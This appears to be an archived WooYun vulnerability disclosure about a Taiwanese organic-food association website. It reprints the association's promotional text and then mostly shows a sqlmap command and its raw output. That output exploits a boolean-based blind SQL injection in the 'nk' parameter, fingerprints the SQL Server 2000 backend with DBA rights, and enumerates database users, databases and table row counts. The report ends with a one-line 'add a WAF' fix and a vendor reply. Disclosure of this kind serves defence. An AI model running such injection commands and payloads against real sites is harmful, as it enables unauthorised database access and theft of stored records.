乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-22: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经确认,细节仅向厂商公开 2015-12-05: 细节向核心白帽子及相关领域专家公开 2015-12-15: 细节向普通白帽子公开 2015-12-25: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
本協會建立「台灣特供食品」標章的目的,是希望把好的產品推薦給想要健康的消費大眾,末學從事有機產品認證工作近20多年,了解有良心的農戶從事有機或GAP栽培的辛苦,更知道社會大眾都想吃到安心的食品,然而,辛苦栽培的生產者不知客戶在那裡?想要吃安心食品的消費者不知去那裡買?更不用說其他問題了。為了這些問題,去年我們把「中華有機農業協會」轉換成為諮詢輔導單位,用來整合資源並建立兩岸有機PGS產銷聯盟,我們會提出一系列的辦法,包括:方案策略丶操作方式丶農場管理丶農友培訓丶認證辦法丶消費者監督機制丶溯源管理系統、后市場管理丶電子商務丶兩岸物流丶國際商貿丶多國認證.....等等,我們希望廣大消費大德能站出來,讓我們每人出一點點力量,依循IFOAM的理念做出對自己及社會大眾健康有益的公益事業。請相信我們自己,我們一定能做得到的。以上報告
地址:http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA
python sqlmap.py -u "http://**.**.**.**/main/CN/news.php?T=S&nk=DHJAYA9HN8MM&tk=FGWMN7BSFTAA" -p nk --technique=B --random-agent --batch -D Aftsc --count
back-end DBMS: Microsoft SQL Server 2000Database: Aftsc+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.WorkLog | 5433900 |Table: WorkLog[9 columns]+----------+----------+| Column | Type |+----------+----------+| Content | ntext || ID | int || LggKey | nchar || OrganKey | nchar || Summary | nvarchar || UserKey | nchar || UserName | nvarchar || WorkIp | nvarchar || WorkTime | datetime |+----------+----------+
---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000current user: 'php'current user is DBA: Truedatabase management system users [9]:[*] BUILTIN\\Administrators[*] php[*] rs[*] sa[*] siwang[*] TFLogin[*] transfriend_cn[*] yunlin[*] zhcertdatabase management system users password hashes:[*] php [1]: password hash: NULL[*] rs [1]: password hash: NULL[*] sa [1]: password hash: NULL[*] siwang [1]: password hash: NULL[*] TFLogin [1]: password hash: NULL[*] transfriend_cn [1]: password hash: NULL[*] yunlin [1]: password hash: NULL[*] zhcert [1]: password hash: NULLsqlmap resumed the following injection point(s) from stored session:---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000sqlmap resumed the following injection point(s) from stored session:---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000available databases [10]:[*] Aftsc[*] aftsc2[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] transfriend_cn[*] yunlinsqlmap resumed the following injection point(s) from stored session:---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000current database: 'Aftsc'sqlmap resumed the following injection point(s) from stored session:---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000Database: Aftsc+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.WorkLog | 5433900 || dbo.Show_ProductScheme | 64204 || dbo.JobItemMethod | 45738 || dbo.D141129_Job | 44297 || dbo.JobKey | 22910 || dbo.PlanKey | 19132 || dbo.ProductScheme | 17125 || dbo.ExamineeKey | 15379 || dbo.ProduceJob | 15102 || dbo.Show_DataName | 13951 || dbo.MultiLogin | 10702 || dbo.V_ProductScheme | 8882 || dbo.V_ProductScheme_Item | 7940 || dbo.StuffProviderKey | 7638 || dbo.D141129_Plan | 6477 || dbo.Show_ProduceTCA | 6104 || dbo.StuffSource | 5863 || dbo.zTemp_pName2TWMOOLOONZHCER | 5839 || dbo.D141129_Label | 4499 || dbo.ProcessManage | 4185 || dbo.TCADetail | 4077 || dbo.D141129_Apply | 3952 || dbo.zTemp_pName2ENMOOLOONZHCER | 3929 || dbo.Material | 3499 || dbo.ApplyLabelDetail | 3194 || dbo.LabelDraw | 3181 || dbo.Show_Examinee | 3158 || dbo.ProductLgg | 3093 || dbo.ApplyLabel | 2983 || dbo.ProducePlan | 2966 || dbo.Glebe | 2720 || dbo.ProductName | 2636 || dbo.D141129_TCA | 2539 || dbo.SysMsg | 2488 || dbo.JobItem | 2382 || dbo.NewsList | 2283 || dbo.JobMaterial | 2097 || dbo.V_Farm_UserList | 1594 || dbo.ProduceTCA | 1526 || dbo.ProductImg | 1501 || dbo.UserList | 1432 || dbo.JobStuffSource | 1381 || dbo.U_ProductKindName | 1258 || dbo.ProductMap | 1255 || dbo.v_ProductName_Key | 1255 || dbo.v_ProductName | 1254 || dbo.ProductKind1_Material | 1230 || dbo.Show_Register | 1102 || dbo.ClientList | 955 || dbo.Farm | 900 || dbo.Examinee | 854 || dbo.StuffProviderCer | 833 || dbo.ProductKind1_JobItem | 813 || dbo.JobMethod | 652 || dbo.ProcessStatus | 585 || dbo.V_Used_ProductKey | 561 || dbo.StuffProvider | 521 || dbo.RightLgg | 494 || dbo.zTemp_NKAOHGBZDHEA | 452 || dbo.zTemp_NJ93EKBVW6MA | 450 || dbo.zTemp_NJ96XHBYX9KA | 450 || dbo.zTemp_NJ9SZHBZ8DLA | 450 || dbo.V_Used_ItemKey | 422 || dbo.ProduceSale | 382 || dbo.ProductLevel | 365 || dbo.ProductKind3 | 339 || dbo.CodeTable2 | 338 || dbo.Certificate | 312 || dbo.CodeTable | 298 || dbo.RightTable | 247 || dbo.U_RightCodeName | 247 || dbo.LggCode | 234 || dbo.ProcessItem | 216 || dbo.zTemp_E_F_G_MOOLOONZHCER | 198 || dbo.RightLevel | 185 || dbo.ProductKind1_JobMethod | 184 || dbo.sysconstraints | 162 || dbo.ProcessMain | 156 || dbo.OrganListKey | 149 || dbo.ProductKind | 137 || dbo.DownFiles | 133 || dbo.zTemp_NJ96XHBYXALA | 118 || dbo.zTemp_NJ9IKKBQ4LNA | 118 || dbo.zTemp_NKA2EGBPTFEA | 118 || dbo.zTemp_NKAOHGBZDIEA | 118 || dbo.V_Used_MaterialKey | 117 || dbo.IntroType | 106 || dbo.NewsType | 94 || dbo.NewsImg | 86 || dbo.ProductKind2 | 84 || dbo.IntroList | 78 || dbo.LabelSale | 76 || dbo.Log_DBUpdate | 75 || dbo.RightTree | 70 || dbo.Criterion | 68 || dbo.SiteLink | 63 || dbo.V_Used_MethodKey | 63 || dbo.DownType | 55 || dbo.ListForm | 55 || dbo.zTemp_E_F_G_LKJIHGFEDCBA | 43 || dbo.OrganLgg | 37 || dbo.DBVersion | 35 || dbo.JobDocType | 31 || dbo.ProductKind1 | 28 || dbo.ListType | 25 || dbo.V_Used_CodeKey | 22 || dbo.ValidateType | 21 || dbo.IntroImg | 20 || dbo.SysCode | 20 || dbo.KindJobMap | 19 || dbo.ListField | 19 || dbo.Trademark | 18 || dbo.Principal | 17 || dbo.V_Used_OrganKey2 | 17 || dbo.LggTable | 16 || dbo.OrganList | 14 || dbo.JobItemMaterial | 13 || dbo.QualityType | 11 || dbo.RightCode | 10 || dbo.ApplyBlankOut | 9 || dbo.RegTempTable | 9 || dbo.V_Used_MaterialKey3 | 9 || dbo.V_Used_OrganKey | 9 || dbo.zTemp_pName2TWLKJIHGFEDCBA | 9 || dbo.ProcessScheme | 8 || dbo.LabelPrint | 7 || dbo.zTemp_pName2CNLKJIHGFEDCBA | 7 || dbo.JobDocList | 6 || dbo.ProduceDoc | 6 || dbo.V_Used_TrademarkKey | 5 || dbo.V_Used_LggKey2 | 4 || dbo.RepineType | 3 || dbo.syssegments | 3 || dbo.ValidateDoc | 3 || dbo.ValidateList | 3 || dbo.ProcessAnnex | 2 || dbo.StuffSourceAnnex | 2 || dbo.V_Used_LggKey | 2 || dbo.QualityList | 1 || dbo.TCAAnnex | 1 || dbo.zTemp_NJ9N49APTRDO | 1 |+--------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: nk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: T=S&nk=DHJAYA9HN8MM' AND 9495=9495 AND 'eFEJ'='eFEJ&tk=FGWMN7BSFTAA---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: Microsoft SQL Server 2000Database: AftscTable: WorkLog[9 columns]+----------+----------+| Column | Type |+----------+----------+| Content | ntext || ID | int || LggKey | nchar || OrganKey | nchar || Summary | nvarchar || UserKey | nchar || UserName | nvarchar || WorkIp | nvarchar || WorkTime | datetime |+----------+----------+
上WAF。
危害等级:中
漏洞Rank:6
确认时间:2015-11-25 16:04
這個是台灣公司網站,IP地址和聯絡方法都是台灣,到請聯絡 TWNCERT 處理
暂无